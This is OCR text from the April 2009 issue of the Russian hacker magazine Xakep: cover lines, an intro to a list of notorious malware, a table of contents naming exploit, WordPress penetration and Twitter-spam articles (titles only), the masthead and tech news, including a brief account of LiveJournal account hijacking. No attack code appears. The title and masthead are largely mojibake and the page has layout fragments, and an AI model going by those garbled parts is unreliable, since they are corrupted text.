ÃÂ›ÃÂ£ÃÂ§ÃÂ¨ÃÂ˜ÃÂ¥ ÃÂ’ÃÂ˜ÃÂ ÃÂ£ÃÂ¡ÃÂžÃÂ’ - Xakep Online

ПОЛНЫЙ АНАЛИЗ ПРИВАТНЫХ БАГОВ WORDPRESS СТР. 52 

x 04(АПРЕЛЬ)2009 10 ЛУЧШИХ ВИРУСОВ/ ИСТОРИЯ ЗЛА 1999-2009 

124 

АПРЕЛЬ 04 (124) 2009 

ДЕНЬ ГЕЙМЕРА 

WWW.GAMER-CITY.RU 

СТР. 4 

Melissa 

PC27 adaptor 

7 

1 

Sasser 

Sony rootkit 

НАВИГАЦИЯ 

БЕЗ GPS 

АЛЬТЕРНАТИВНЫЕ 

СПОСОБЫ 

ОПРЕДЕЛЕНИЯ 

КООРДИНАТ 

СТР. 26 

Loveletter 

Slammer 

6 

ЖУРНАЛ ОТ КОМПЬЮТЕРНЫХ ХУЛИГАНОВ 

Code red 

J3 

БАЗУ ДАННЫХ 

НЕ СТАЩИТЬ! 

НОВЫЙ ПУТЬ 

ДЛЯ ЗАЩИТЫ 

ДАННЫХ В БД 

СТР. 32 

5 

2 

Warezov 

10 

Nimda 

Mebroot 

www.xakep.ru 

АТАКА 

ТВИТТЕРА 

КАК СПАМЯТ 

TWITTER 

СКРИПТАМИ НА 

PYTHON’E 

СТР. 88 

PC27 

ЛУЧШИХ 

ВИРУСОВ 

ИСТОРИЯ ЗЛА 

1999-2009 

СТР. 20 

8 

3 

Storm 

4 

9

Intro 

Intro 

Intro 

Intro 

Intro 

Intro 

В 1999 году Девиду Смиту хватило ста строк неискушенного 

кода, чтобы устроить мировую эпидемию, 

заразив Мелиссой десятки миллионов компьютеров. 

И хотя с тех пор все здорово поменялось, степень 

проникновения разнообразной малвари едва ли 

уменьшилась. Чего стоит хотя бы январский червь 

Downadup, который до сих пор наводит страх на 

Windows-пользователей. Что уж говорить про разношерстный 

приватный софт для обустройства ботнетов 

и отжима денег с населения развитых стран. 

В этом месяце мы решили вспомнить, как развивалась 

публичная вирусная индустрия и составили 

своеобразный рейтинг самых популярных малварей 

за последние 10 лет. 

nikitoz, гл. ред. Х 

P.S. Наши друзья-геймеры из игровых журналов 

Gameland решили замесить крутую акцию под кодовым 

названием «День Геймера». Если интересно — 

читай подробности на странице 4.

CONTENT 

04(124) 

Nimda 

004 MEGANEWS 

Все новое за последний месяц 

FERRUM 

016 Nовый Wi-Fi 

Тест Draft N Wi-Fi роутеров 

PC_ZONE 

020 10 ЗЛО-ВИРУСОВ 

Самая нашумевшая малварь 

за последние 10 лет 

026 НАВИГАЦИЯ БЕЗ GPS 

Как определить свои координаты 

по IP, GSM/UMTS и Wi-Fi 

030 КОГДА ТЫ СТАНЕШЬ СЛЕПЫМ 

Это только сейчас кажется, 

что здоровье будет всегда 

032 БАЗУ ДАННЫХ НЕ СТАЩИТЬ! 

Правильные способы защитить 

данные в таблицах БД 

ВЗЛОМ 

038 EASY HACK 

Хакерские секреты простых вещей 

042 ОБЗОР ЭКСПЛОЙТОВ 

Свежие уязвимости от Сквоза 

048 МЕРЯЕМ УЯЗВИМОСТИ 

Классификаторы и метрики 

компьютерных брешей 

052 WORDPRESS: 

ТЕСТ НА ПРОНИКНОВЕНИЕ 

Полный анализ малоизвестных 

уязвимостей раскрученного движка 

058 ИМПЛАНТАЦИЯ CISCO 

Модифицирование прошивки маршрутизатора 

064 IPHONE ТЕРМИНАТОР 

Создаем автоматическое средство 

аудита Apple iPhone 

070 Х-TOOLS 

Программы для взлома 

СЦЕНА 

072 МЕДИА-МАГНАТЫ 

ПРОТИВ BITTORRENT 

Судебный процесс по делу The Pirate Bay 

ЮНИКСОЙД 

080 ОБРЕЧЕННЫЕ НА УСПЕХ 

Обзор самых интересных проектов, 

представленных на UNIX-конференциях 

084 ВСТРАИВАЕМ ПИНГВИНА 

Учимся ставить Linux на микроконтроллеры 

КОДИНГ 

088 АТАКА НА МИСТЕРА ТВИТТЕРА 

Пишем скрипты для спама Twitter на Python’e 

094 ПИТОН ДЛЯ МАТЕРЫХ 

ХАРДКОРЩИКОВ 

Куем ассемблерные вставки 

в Python с помощью кошерного CorePy 

ФРИКИНГ 

098 ИНФРАКРАСНАЯ ЛЕНЬ 

Управлять с пульта можно 

не только телевизором 

102 ГРОМ И МОЛНИИ 

Эксперимент по передаче 

энергии на расстояние 

SYN/ACK 

106 ЗА СЕМЬЮ ПЕЧАТЯМИ 

Win2k8: средства и инструменты безопасности 

110 УЗНИК ТАЙНОЙ ТЮРЬМЫ 

Используем FreeBSD Jail 

для изолирования небезопасных сервисов 

115 ЗВЕЗДНОЕ ПОПУРРИ 

Фокусничаем с IP-PBX Asterisk 

ЮНИТЫ 

120 ДЕНЬ ЗАВИСИМОСТИ (2009, VHSRIP) 

Полный ][-гайд по основным аддикциям 

124 FAQ UNITED 

Большой FAQ 

127 ДИСКО 

8,5 Гб всякой всячины 

128 WWW2 

Удобные web-сервисы

Mebroot 

020 

БАЗА 

ДАННЫХ 

1C 

Прав 

доступа нет 

Запрос 

данных 

Возврат пустого 

значения 

БАЗА 

ДАННЫХ 

CRYPTO 



026 Злоумышленник 

032 

BID 

048 

Secunia 

OSVDB 

088 

ISS X-Force 

/ÐÅÄÀÊÖÈЯ 

>Ãëàâíûé ðåäàêòîð 

Íèêèòà «nikitozz» Êèñëèöèí 

(nikitoz@real.xakep.ru) 

>Âûïóñêàþùèé ðåäàêòîð 

Николай«gorl»Андреев 

(gorlum@real.xakep.ru) 

>Ðåäàêòîðû ðóáðèê 

ÂÇËÎÌ 

Дмитрий«Forb» Докучаев 

(forb@real.xakep.ru) 

PC_ZONE и UNITS 

Степан «step» Ильин 

(step@real.xakep.ru) 

UNIXOID, SYN\ACK и PSYCHO 

Àíäðåé «Andrushock» Ìàòâååâ 

(andrushock@real.xakep.ru) 

ÊÎÄÈÍÃ 

Александр «Dr. Klouniz» Лозовский 

(alexander@real.xakep.ru) 

ФРИКИНГ 

Сергей «Dlinyj»Долин 

(dlinyj@real.xakep.ru) 

>Ëèòåðàòóðíûй ðåäàêòîð 

Дмитрий Лященко 

(lyashchenko@gameland.ru) 

/DVD 

>Выпускающий редактор 

Степан «Step» Ильин 

(step@real.xakep.ru) 

>Редактор Unix-раздела 

Антон «Ant» Жуков 

>Редактор тематических подборок 

Андрей Комаров 

(komarov@gameland.ru) 

>Монтаж видео 

Максим Трубицын 

/ART 

>Àðò-äèðåêòîð 

Евгений Новиков 

(novikov.e@gameland.ru) 

>Верстальщик 

Вера Светлых 

(svetlyh@gameland.ru) 

>Фото 

Иван Скориков 

/XAKEP.RU 

>Ðåäàêòîð ñàéòà 

Ëåîíèä Áîãîëþáîâ 

(xa@real.xakep.ru) 

/ÐÅÊËÀÌÀ 

/ Тел.: (495) 935-7034, факс: (495) 780-8824 

>Директор группы GAMES & DIGITAL 

Евгения Горячева (goryacheva@gameland. 

ru) 

>Менеджеры 

Ольга Емельянцева 

Мария Нестерова 

Мария Николаенко 

Марина Румянцева 

Максим Соболев 

>Администратор 

Мария Бушева 

>Директор корпоративной группы 

(работа с рекламными агентствами) 

Лидия Стрекнева (strekneva@gameland.ru) 

>Старший менеджер 

Светлана Пинчук 

>Менеджеры 

Надежда Гончарова 

Наталья Мистюкова 

>Старший трафик-менеджер 

Марья Алексеева (alekseeva@gameland.ru) 

/PUBLISHING 

>Èçäàòåëи 

Рубен Кочарян 

(noah@gameland.ru) 

>Ó÷ðåäèòåëü 

ÎÎÎ «Ãåéì Ëýíä» 

>Äèðåêòîð 

Äìèòðèé Àãàðóíîâ 

(dmitri@gameland.ru) 

>Óïðàâëÿþùèé äèðåêòîð 

Äàâèä Øîñòàê 

(shostak@gameland.ru) 

>Äèðåêòîð ïî ðàçâèòèþ 

Ïàøà Ðîìàíîâñêèé 

(romanovski@gameland.ru) 

>Äèðåêòîð ïî ïåðñîíàëó 

Ìèõàèë Ñòåïàíîâ 

(stepanovm@gameland.ru) 

>Ôèíàíñîâûé äèðåêòîð 

Леонова Анастасия 

(leonova@gameland.ru) 

>Редакционный директор 

Дмитрий Ладыженский 

(ladyzhenskiy@gameland.ru) 

>PR-менеджер 

Наталья Литвиновская 

(litvinovskaya@gameland.ru) 

/ÎÏÒÎÂÀЯ ÏÐÎÄÀÆÀ 

>Äèðåêòîð îòäåëà 

äèñòðèáóöèè 

Àíäðåé Ñòåïàíîâ 

(andrey@gameland.ru) 

>Ñâÿçü ñ ðåãèîíàìè 

Òàòüÿíà Êîøåëåâà 

(kosheleva@gameland.ru ) 

>Подписка 

Марина Гончарова 

(goncharova@gameland.ru) 

òåë.: (495) 935.70.34 

ôàêñ: (495) 780.88.24 

> Ãîðячая ëèíèя ïî ïîäïèñêå 

òåë.: 8 (800) 200.3.999 

Áåñïëàòíî äëÿ çâîíÿùèõ èç Ðîññèè 

> Äëя писем 

101000, Ìîñêâà, 

Ãëàâïî÷òàìò, à/ÿ 652, Õàêåð 

Çàðåãèñòðèðîâàíî â Ìèíèñòåðñòâå 

Ðîññèéñêîé Ôåäåðàöèè ïî äåëàì ïå÷àòè, 

òåëåðàäèîâåùàíèþ è ñðåäñòâàì ìàññîâûõ 

êîììóíèêàöèé ÏÈ ß 77-11802 îò 14 

ôåâðàëÿ 2002 ã. 

Îòïå÷àòàíî â òèïîãðàôèè 

«Lietuvas Rivas», Литва. 

Òèðàæ 100 000 ýêçåìïëÿðîâ. 

Öåíà äîãîâîðíàÿ. 

Ìíåíèå ðåäàêöèè íå îáÿçàòåëüíî 

ñîâïàäàåò ñ ìíåíèåì àâòîðîâ. Ðåäàêöèÿ 

óâåäîìëÿåò: âñå ìàòåðèàëû â íîìåðå 

ïðåäîñòàâëÿþòñÿ êàê èíôîðìàöèÿ ê 

ðàçìûøëåíèþ. Ëèöà, èñïîëüçóþùèå 

äàííóþ èíôîðìàöèþ â ïðîòèâîçàêîííûõ 

öåëÿõ, ìîãóò áûòü ïðèâëå÷åíû ê 

îòâåòñòâåííîñòè. Ðåäàêöèÿ â ýòèõ ñëó÷àÿõ 

îòâåòñòâåííîñòè íå íåñåò. 

Ðåäàêöèÿ íå íåñåò îòâåòñòâåííîñòè çà 

ñîäåðæàíèå ðåêëàìíûõ îáúÿâëåíèé â 

íîìåðå. Çà ïåðåïå÷àòêó íàøèõ ìàòåðèàëîâ 

áåç ñïðîñà — ïðåñëåäóåì. 

Объединенная медиакомпания Gameland 

предлагает партнерам лицензии и права на 

использование контента журналов, дисков, 

сайтов и телеканала Gameland TV. По всем 

вопросам, связанным с лицензированием 

и синдицированием обращаться по адресу 

content@gameland.ru.

meganews 

PC27 

J3 

J3 

PC27 

МАРИЯ «MIFRILL» НЕФЕДОВА / MIFRILL@R EAL.XAKEP.RU / 

ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 

Новые дисплеи 

от Samsung 

Этой весной компания Samsung порадует нас новой 

линейкой мониторов. В 50 серию войдут девять широкоформатников 

с диагоналями 20’’, 21,5’’ и 23’’. Технические 

характеристики таковы: время отклика 2 мс для всех 

моделей, кроме трех мониторов с аналоговым интерфейсом, 

они будут немного медленнее — 5 мс; динамическая 

контрастность 50.000:1; яркость 300 кд/м2. Разрешение 

тоже порадует: 1200х900 — у трех младших моделей 

серии и 1920х1080 — у остальных. Благодаря технологии 

MagicBright3, настроить монитор под свои нужды не 

составит труда, — уже имеется шесть готовых профилей: 

«Текст», «Интернет», «Спорт», «Кино», «Игры», а также 

наличествует пользовательский режим. Дизайн серии 

отличается строгими линями, четкими углами, и даже 

кнопки управления выполнены в гладком сенсорном 

варианте. За счет сочетания угольно-черной рамки с корпусом 

цвета «черный гранат», 50 серия выглядит интересно 

и необычно. Увидеть ее своими глазами можно будет 

уже в апреле-мае, когда новинки доберутся до прилавков 

магазинов. 

День геймера 

(game)land и «Эльдорадо» дарят всем 

российским геймерам профессиональный 

праздник — День Геймера! 25 и 26 апреля 

в пяти магазинах «Эльдорадо» в городе 

Москве можно будет с размахом отметить 

событие — ознакомиться с игровыми новинками, 

принять участие в различных турнирах 

по хитовым играм, приобрести игровую 

продукцию по специальным ценам и просто 

отлично провести время. Все подробности 

на сайте www.gamer-city.ru! Не пропусти! 

В каждом из магазинов создана игровая 

зона. В демонстрационной части — новейшие 

проекты для РС и Xbox 360, в турнирной 

— поединки по самым популярным игровым 

дисциплинам, на сцене — зажигательные 

ведущий и ди-джей, которые будут поддерживать 

и разогревать атмосферу праздника. 

Помимо этого — веселые конкурсы, море 

призов, подарков и дружелюбная атмосфера. 

Приняв участие в турнире, все желающие 

004 

ПО ОФИЦИАЛЬНОЙ СТАТИСТИКЕ APPLE, IPHONE 

OS УЖЕ УСТАНОВЛЕНА НА 30 МИЛЛИОНАХ 

МОБИЛЬНЫХ УСТРОЙСТВ. 

становятся участниками Континентальной 

Лиги — на официальном сайте будут 

публиковаться таблицы с рейтингами лучших 

игроков. Стань героем своей страны! Турниры 

будут проводиться по следующим дисциплинам 

- каждый сможет найти себе достойных 

соперников: 

•F.E.A.R. 2: Project Origin(PC) 

•Call of Duty: World at War(PC) 

•GRID (PC) 

•Gears of War 2 (Xbox 360) 

•Mortal Kombat vs. DC Universe (Xbox 360) 

Задать вопросы о мероприятии можно на 

форуме www.gameland.ru в специально 

созданном разделе FAQ. 

АДРЕСА МАГАЗИНОВ 

ПРОВЕДЕНИЯ АКЦИИ: 

•ЛЮБЛИНСКАЯ УЛ., Д. 153 , ТК Л-153 

•РЯЗАНСКИЙ ПР. 2, ТК ГОРОД 

•БУТАКОВА Д.2, ТК ГРАНД 

•БАГРАТИОНОВСКИЙ ПРОЕЗД Д.7, 

ТК ГОРБУШКИН ДВОР 

•КИРОВОГРАДСКАЯ УЛ., Д.13, ТК КАРЕНФОР 

XÀÊÅÐ 04 /124/ 09

PC27 

>> meganews 

Налог 

на контрафакт 

PC27 

Есть на нашем голубом шарике совсем небольшое пятнышко — остров 

Мэн. Это местечко во всем мире известно как оффшорная зона и уникально 

тем, что, являясь коронным владением Великобритании, не входит 

ни в состав самой Великобритании, ни в состав ЕС. И хотя живет там 

всего 76.000 человек, эти люди довольно активно пользуются интернетом 

(на острове есть целых три провайдера). Разумеется, жители Мэна, 

как и все прогрессивное человечество, пользуются файлообменниками, 

пиринговыми сетями, а стало быть, качают всяческий контрафакт. И пока 

в других странах юзеров за это показательно судят и штрафуют, советник 

правительства по электронному бизнесу Рон Берри предложил совершенно 

иное решение — на острове введен смешной налог в размере 

одного фунта стерлингов, оплатить который можно даже с мобильного 

телефона. Из собранных с населения средств будут производиться официальные 

отчисления музыкантам и звукозаписывающим компаниям. 

Кому именно и сколько платить, помогут определить провайдеры острова, 

уже установившие у себя специальное оборудование, при помощи 

которого можно будет узнать, кто и какую конкретно музыку скачивал. 

Интересно, когда до подобных схем додумаются не только на Мэне?.. 

Цветной e-ink 

Вот и появилось, наконец, в продаже первое устройство для чтения 

электронных книг с цветным дисплеем. Пионер в сфере цветных ридеров 

на базе электронной бумаги (что примечательно, используются не 

разработки компании E-ink, а собственная технология) носит имя FLEPia 

и стал детищем Fujitsu Frontech Limited и Fujitsu Laboratories Limited. 

Экран девайса с диагональю 8 " и разрешением 768х1024 способен 

отображать 260.000 цветов. Однако радоваться рано — при работе «на 

полную мощность» устройству потребуется 8 секунд для прорисовки 

страницы, что переходит все разумные границы. При сокращении 

количества цветов до 4096 жутковатая цифра уменьшается до 5 секунд, а 

при 64 — достигает более-менее приемлемого показателя в 1.8 секунды. 

Остальные характеристики тоже довольно необычны для ридеров: 

Windows CE5.0 ОС, тачскрин, поддержка Wi-Fi IEEE802.11b/g и Bluetooth 

Ver2.0+EDR, подключение к ПК через USB, поддержка SD-карт до 4 Гб. 

Аккумулятор, разумеется, менее «живуч» — выдерживает смену страниц 

2400 раз в 64-цветном режиме (для читалок в градациях серого этот 

показатель обычно равен 7000-9000 «перелистываний»). Цена девайса 

составляет $1015, и доступен он пока только в Японии. Остальным 

странам, традиционно, придется подождать. Притом — лучше ждать не 

FLEPia, а дальнейшего развития прогресса :). 

Русский магазин HP 

ИЗ-ЗА КРИЗИСА ДОЛЯ ПИРАТСКИХ 

DVD- И CD-ДИСКОВ В ОБЩЕМ ОБЪЕМЕ 

ПРОДАЖ УВЕЛИЧИЛАСЬ НА 5%. 

В начале марта в Москве, под 

крышей торгового комплекса 

«Горбушкин двор», открылся 

первый в России фирменный 

магазин компании HP. Выбор 

места вряд ли кого-то удивит, 

— «Горбушкин двор» один из 

крупнейших и наиболее посещаемых 

«электронных развалов» 

столицы. 

Магазин расположился в секторе 

«Ноутбуки», но, несмотря 

на это, представлены в нем не 

только ноуты, но и весь спектр 

продукции компании — от десктопов 

до устройств печати. 

Бесспорными плюсами официального 

магазина будут возможность 

приобрести товар с 

дополнительными гарантиями 

подлинности и качества, протестировать 

интересующие продукты 

или ознакомиться с «эксклюзивными» 

и редкими моделями, 

а также проконсультироваться 

с ведущими специалистами, 

получив свежую и достоверную 

информацию. 

Дирекция HP делает обнадеживающие 

прогнозы — если проект 

окажется выгоден не только 

с имиджевых позиций, но и 

коммерчески, в других крупных 

городах тоже появятся официальные 

магазины. 

006 

XÀÊÅÐ 04 /124/ 09

PC27 

>> meganews 

Аварийная 

кнопка от Gmail 

J3 

Сколько раз за свою жизнь, 

написав и отправив e-mail, ты 

жалел о содеянном? Все мы порой 

можем наговорить лишнего, 

банально ошибиться адресом 

или забыть упомянуть что-то 

важное... И, разумеется, осознаем 

это только после нажатия 

кнопки «Send» (закон подлости 

во всей красе!). Но, оказывается, 

от этого страдают не только 

юзеры, но и сами разработчики. 

Во всяком случае, разработчики 

Google точно. Ведь это их 

усилиями у Gmail появилась 

новая функция — «undo sent», 

то есть «отменить отправку». 

Такое предложение теперь 

появляется после нажатия 

кнопки «Отправить». Система 

в течение 5 секунд придерживает 

письмо, давая нам шанс 

передумать. Определенно — не 

самая бесполезная опция, 

правда, 5-секундная задержка 

это, все же, маловато. 

СОГЛАСНО СТАТИСТИКЕ JIWIRE, 

РОССИЯ НАХОДИТСЯ НА 8 МЕСТЕ В 

МИРЕ ПО КОЛИЧЕСТВУ WI-FI ТОЧЕК. 

Халява, сэр! 

На дворе мировой финансовый 

кризис, но, похоже, британцев он 

мало волнует. Недавно у одного из 

крупнейших британских поставщиков 

книг для Amazon.com 

истекла аренда склада (видимо, 

«внезапно», как оно всегда бывает). 

Товар там лежал не слишком 

ходовой, и хозяева попросту 

от него отказались. В итоге, на 

руках у владельцев помещения 

остался огромный ангар, забитый 

миллионами букинистических 

книг, которые нужно было как-то, 

куда-то вывозить. Возвращать их в 

издательства вышло бы слишком 

накладно, и решено было сделать 

ход конем. Территорию Bristol 

Bookbarn объявили территорией 

халявы, открыв двери всем 

желающим. Люди приходили и 

приезжали к складу, чтобы покопаться 

в завалах и забрать столько 

книг, сколько смогут унести (а 

некоторым удавалось уносить до 

150 томов за раз). Склад «зачистили» 

на ура, книги отправились 

в добрые руки, и справедливость 

восторжествовала. Но непонятно 

другое — что подвигло Amazon. 

com на такую щедрость, и с каких 

пор крупнейший е-шоп разбрасывается 

товаром и так относится к 

книгам. 

IE 8. Релиз 

Компания Microsoft, наконец-то, 

выпустила финальную версию 

Internet Explorer 8. Произошло это 

19 марта, а уже 20-го браузер первый 

раз сломали :). На конференции 

PWN2OWN, организованной 

компанией 3Com, устроили соответствующий 

конкурс. В ходе него 

немец под ником Nils, используя 

собственный эксплойт под IE7, 

без проблем проник на машину с 

последней сборкой Windows 7 и 

IE8 и похитил оттуда указанный 

организаторами файл. На все про 

все у парня ушло порядка пяти 

минут. За взлом Nils’у торжественно 

вручили 5000 долларов и 

новенький Sony Vaio, а детальное 

описание хака и эксплойт отправились 

прямиком в Microsoft 

Security Research Center. 

В целом, новая версия браузера 

не несет в себе ничего революционного, 

хотя IE8 определенно 

стабильнее своих предшественников. 

Теперь браузер умеет 

закрывать отдельные зависшие 

вкладки (по образу и подобию 

Google Chrom), обладает функцией 

анонимного серфинга InPrivate 

и оснащен защитой от фишинга 

SmartScreen. 

008 

XÀÊÅÐ 04 /124/ 09

meganews 

В Пентагоне 

тоже любят sci-fi 

Кто бы мог подумать, что образное 

выражение «стрельба 

из пушки по воробьям» станет 

реальностью. Стрелять, правда, 

собираются не по воробьям, а по 

комарам, и пушка будет лазерная. 

Такая гениальная мысль 

пришла в голову американским 

ученым, во времена холодной 

войны работавшим над созданием 

лазерной ПРО. Холодная 

война давно миновала, ценные 

мощности простаивают без дела, 

а от них, оказывается, может быть 

и совсем другой прок. Установки 

можно переориентировать на 

борьбу с насекомыми — заставить 

сжигать полчища кровососов, 

внеся большой вклад в борьбу с 

малярией и другими болезнями, 

переносимыми комарами. Стоит 

заметить, что тут не обошлось без 

Билла Гейтса, который вложил в 

научные проекты, направленные 

на борьбу с малярией, миллионы, 

и совсем недавно пугал комарами 

из банки слушателей на 

конференции TED. Теперь пушки, 

стоящие вблизи городов, планируют 

«научить» различать писк 

самцов и самок комара, а также 

отличать его от звуков, издаваемых 

другими насекомыми. Все 

поклонники фантастики ликуют, 

а параноики запасают тушенку и 

боеприпасы. 

PC27 

Больше нетбуков, 

хороших и разных 

В ходе CeBIT 2009 компания Gigabyte Technology продемонстрировала 

публике ряд нетбуков, в число которых затесались любопытные модели — 

Touch Note M1028 и Booktop M1022. Первый нетбук интересен своим 10.1’’ 

сенсорным экраном — что, по сути, превращает его в гибрид планшетного 

ПК с ноутом. Экран крепится к корпусу специальным шарниром, за счет которого 

может поворачиваться, и имеет разрешение 1024x600 или 1366x768 

точек. Производитель также сообщает, что девайс поддерживает Wi-Fi, 

Bluetooth и оснащен слотом для Express Card. Остальные характеристики 

пока не разглашаются. Вторая модель — Booktop M1022 — будет комплектоваться 

док-станцией, с которой нетбук сможет подзаряжаться и легким 

движением руки превращаться в десктоп. Подробных характеристик для 

этой модели тоже пока нет, известна лишь диагональ экрана — 10.1’’ и тот 

факт, что устройство будет поддерживать стандарт 3.5G, благодаря модулю 

HSDPA на борту. 

Киборги 

нашего времени 

Наука и прогресс пока не дошли до того, 

чтобы спокойно имплантировать в тело 

человека разные интересные штуки 

(кардиостимуляторы не в счет!). Ну, а раз 

полного «Ghost in the shell» пока не видать, 

приходится придумывать что-то попроще 

и своими силами. Финский программер 

Джерри Ялава после автоаварии лишился 

пальца на руке, но унывал недолго. Получив 

протез, он самостоятельно оснастил его 

встроенной флешкой на 2 Гб. Теперь, чтобы 

воспользоваться протезом не по прямому 

назначению, достаточно сдвинуть ноготь 

искусственного пальца — и можно вставлять 

флешку в USB-порт. На достигнутом Ялава 

останавливать не собирается, уже планируя 

версию 2.0 — со съемной фалангой и большей 

емкостью накопителя. 

010 

XÀÊÅÐ 04 /124/ 09

PC27 

>> meganews 

PANDA SECURITY СООБЩАЕТ: БОЛЕЕ 10 МЛН. КОМПЬЮТЕРОВ В МИРЕ 

ЗАРАЖЕНЫ ВРЕДОНОСНЫМ ПО, ОРИЕНТИРОВАННЫМ НА КРАЖУ 

ФИНАНСОВОЙ ИНФОРМАЦИИ. 

Ноутбук с характером 

суперкара 

IBM + SUN = ? 

Интересную информацию распространило издание The Wall Street Journal. 

Ссылаясь на конфиденциальный источник, журнал сообщил, что корпорация IBM 

ведет переговоры о покупке компании Sun Microsystems, пользуясь сложившимися 

условиями финансового кризиса. Более того, источник утверждает, что сделка может 

состояться совсем скоро и называет минимальную сумму, фигурирующую в переговорах 

— 6.5 млрд. долларов. Если информация подтвердится, то это приобретение 

станет крупнейшим за всю историю IBM и поможет ей укрепить свое положение на 

рынке в нынешнее, не слишком благополучное, время. 

Крупные компьютерные выставки — это всегда множество 

новостей и интересных новинок, и прошедшая в Ганновере 

CeBIT 2009 не стала исключением. Компания Asus 

презентовала на выставке ноутбук Asus-Lamborghini VX5, на 

создание которого инженеров Asus вдохновил автомобиль 

Lamborghini Reventon. Младшего брата шикарного авто отличает 

не только футуристический и оригинальный дизайн, 

но и очень внушительные характеристики. «Под капотом» 

ноутбука расположатся процессор Core2 Quad, 4 Гб ОЗУ и 

SSD-накопитель объемом 1 терабайт. Да-да, это не опечатка, 

Vx5 будет самым «вместительным» ноутбуком в мире, 

большего накопителя пока нет ни у кого. Прибавим к этому 

16’’ экран с поддержкой Full-HD, дискретную видеокарту 

NVIDIA GeForce GT 130M с 1 Гб GDDR3 VRAM, и оптический 

комбо-привод с поддержкой Blu-ray. Если тебе все еще 

недостаточно мощностей, то заметим, что ноутбук может 

работать в режиме TwinTurbo, по сути, разгоняющем ЦП и 

ГП. Одним словом, ценителям стильных и мощных ноутбуков 

эта модель настоятельно рекомендуется. 

Окна, 

но не Windows 

Свой вклад в приближение технического 

прогресса к простым людям внесла 

компания Phillips, представив работающий 

прототип окна с OLED-подсветкой. 

Специалисты исследовательского подразделения 

Phillips не один год трудились 

над созданием прозрачных органических 

светодиодов (OLED), которые 

можно было бы запихнуть между слоями 

пластика или стекла, создав обычное на 

первый взгляд окно, способное в темное 

время суток излучать свет. До появления 

технологии OLED это было невозможно, 

но сейчас дело дошло уже до работающих 

образцов. Теперь основные проблемы 

заключаются в том, что массовое производство 

слишком дорого, для создания 

готовых окон требуется «чистая комната», 

да и цена готовых продуктов выходит за 

разумные пределы. Траблы планируют 

решить уже в течение ближайших лет, 

обеспечив человечество новым, оригинальным 

источником света. 

012 

ПО ДАННЫМ КОМПАНИИ SECUNIA, В FIREFOX БЫЛО 

ОБНАРУЖЕНО 115 УЯЗВИМОСТЕЙ, ЧТО В 4 РАЗА 

БОЛЬШЕ, ЧЕМ ЛЮБОМ ДРУГОМ БРАУЗЕРЕ. 

XÀÊÅÐ 04 /124/ 09

meganews 

Облава на корсаров 

Никто, в общем-то, не сомневался, что пираты тоже оценят новые 

возможности Blu-ray дисков, но в России задержали партию такого 

контрафакта впервые. Отличилась, конечно, Москва, где сотрудники 

ГУВД изъяли с двух складов более миллиона подделок, примерная 

стоимость которых оценивается в 100 млн. рублей. Что интересно, 

пираты, оказывается, используют мощности Blu-ray как-то не 

слишком рационально. В основном на дисках записаны «экранки» 

последних новинок киноиндустрии в формате DVD-видео, или вообще 

в .avi. Разумеется, посмотреть такие диски на Blu-ray аппаратуре 

не выйдет, только на компьютере. Однако розничная стоимость 

такого диска составляла порядка 1000 рублей, учитывая, что лицензионный 

Blu-ray диск стоит 1500 деревянных. Видимо, тяга к халяве 

и сборникам «100 в 1» в России неискоренимы. 

83% САЙТОВ ИМЕЮТ 

КРИТИЧЕСКИЕ УЯЗВИМОСТИ. 

Окукливаемся 

Тема британских ученых, кажется, 

никогда не будет исчерпана. 

Эти ребята и не думают 

останавливать свои исследования 

и разработки. На этот 

раз усилия команды, собранной 

из различных университетов 

страны, направлены на 

создание шлема виртуальной 

реальности, который сможет 

эмулировать запахи, звуки, 

ощущения и поставлять глазам достоверную картинку. Пока девайс 

носит характерное название Virtual Cocoon и внешне действительно 

весьма смахивает на кокон. Эмулировать реальность планируется 

следующим образом. Осязание обеспечат за счет встроенных в шлем 

вентиляторов (будут гнать потоки холодного или горячего воздуха) и 

увлажнителей. Обоняние — за счет трубок, подсоединенных к специальному 

боксу с химикатами и вставляющихся в нос и в рот; а зрение 

будет ублажать HD-экран, способный отобразить картинку в 30 раз 

ярче или темнее обычного ТВ. Ну и, само собой, завершит начатое объемный, 

реалистичный звук. Пока готов только прототип, но разработку 

планируется завершить в течение 5 лет. Ученые мужи настолько уверены 

в успехе начинания, что уже сейчас называют примерную цену на 

чудо-девайс — по их мнению, она составит около 1.500 фунтов. 

XÀÊÅÐ 04 /124/ 09 

013

PC27 

>> meganews 

Рекламная пауза 

Нашествие ЛЖе-юзеров 

Еще один способ превращения 

убытков от пиратства в 

доходы измыслили специалисты 

компании Microsoft. 

Недавно глава подразделения 

по работе с бизнесом, 

Стивен Илоп, сообщил 

изданию The Business Insider, 

что Microsoft укомплектует 

новый Office 14 встроенной 

рекламой. За счет нее 

планируется получать деньги 

даже с пиратских версий 

пакета программ. Чем версия 

с рекламой будет отличаться 

от обычной, платной версии, 

пока неизвестно. Неизвестно 

также, какого рода рекламу 

планируется интегрировать 

в Office 14, и каким 

образом. Выйдет новинка 

не ранее 2010 года, так 

что остается лишь ждать 

подробностей. Пока же 

создается впечатление, 

что в Microsoft просто 

никогда не слышали о баннерорезках. 

Покой пользователей одной из наиболее 

популярных в России платформ 

для блогинга — LiveJournal оказался 

потревожен неизвестными «умниками». 

Последние обратили внимание, 

что многие ЖЖ-аккаунты зарегистрированы 

на просроченные почтовые 

адреса Microsoft Hotmail, чем и 

воспользовались. Так как ящик Hotmail 

после годичного простоя становится 

неактивным, злоумышленникам не составило 

труда покопаться в LJ, в лежащих 

в открытом доступе e-mail адресах, 

вычислить аккаунты, не использовавшиеся 

больше года, и зарегистрировать 

«освободившиеся» ящики заново, уже 

на себя. После этого подавалась заявка 

на восстановление, и ящик оказывался 

в руках хитрецов. Администрация ЖЖ, 

заметившая тенденцию, призывает 

пользователей проверить валидность 

почтовых ящиков и не терять бдительности. 

iPod Suffle — теперь говорящий 

Банкоматы тоже болеют 

В конце марта компания Apple не 

только выпустила бета-версию 

iPhone OS 3.0, которая доберется 

до пользователей уже этим 

летом, но и представила обновленный 

iPod suffle объемом 4 Гб. 

Новинка сразу вызвала немало 

споров. Самый маленький iPod 

стал еще меньше и полностью 

сменил облик, превратившись 

в гладкий, строгий брусок, по 

совместительству являющийся 

самым маленьким плеером в 

мире. Вариантов расцветки у 

iPod shuffle теперь всего два — 

серебристый и черный, безумие 

красок на любой вкус осталось в 

прошлом. Все кнопки управления 

вынесены на встроенный в 

наушники пульт ДУ, что является, 

пожалуй, самой популярной 

темой для нареканий. Дело в 

том, что отныне, кроме «родных» 

